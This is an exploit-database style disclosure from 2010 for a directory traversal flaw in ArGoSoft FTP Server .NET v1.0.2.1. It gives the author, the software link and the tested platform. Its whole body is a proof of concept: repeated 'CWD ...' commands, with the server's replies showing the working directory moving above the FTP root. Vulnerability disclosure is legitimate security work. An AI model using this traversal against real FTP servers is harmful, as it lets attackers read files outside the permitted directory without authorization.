1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
# Exploit Title: ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal # Date: 16.03.2010 # Author: dmnt # Software Link: http://www.argosoft.com/files/apps/FtpServerSetup.msi # Version: ArGoSoft FTP Server .NET v.1.0.2.1 # Tested on: Windows 7 # Code : CWD ... 250 Requested file action OK, completed XPWD 257 "/.../" is working directory CWD ... 250 Requested file action OK, completed XPWD 257 "/.../.../" is working directory |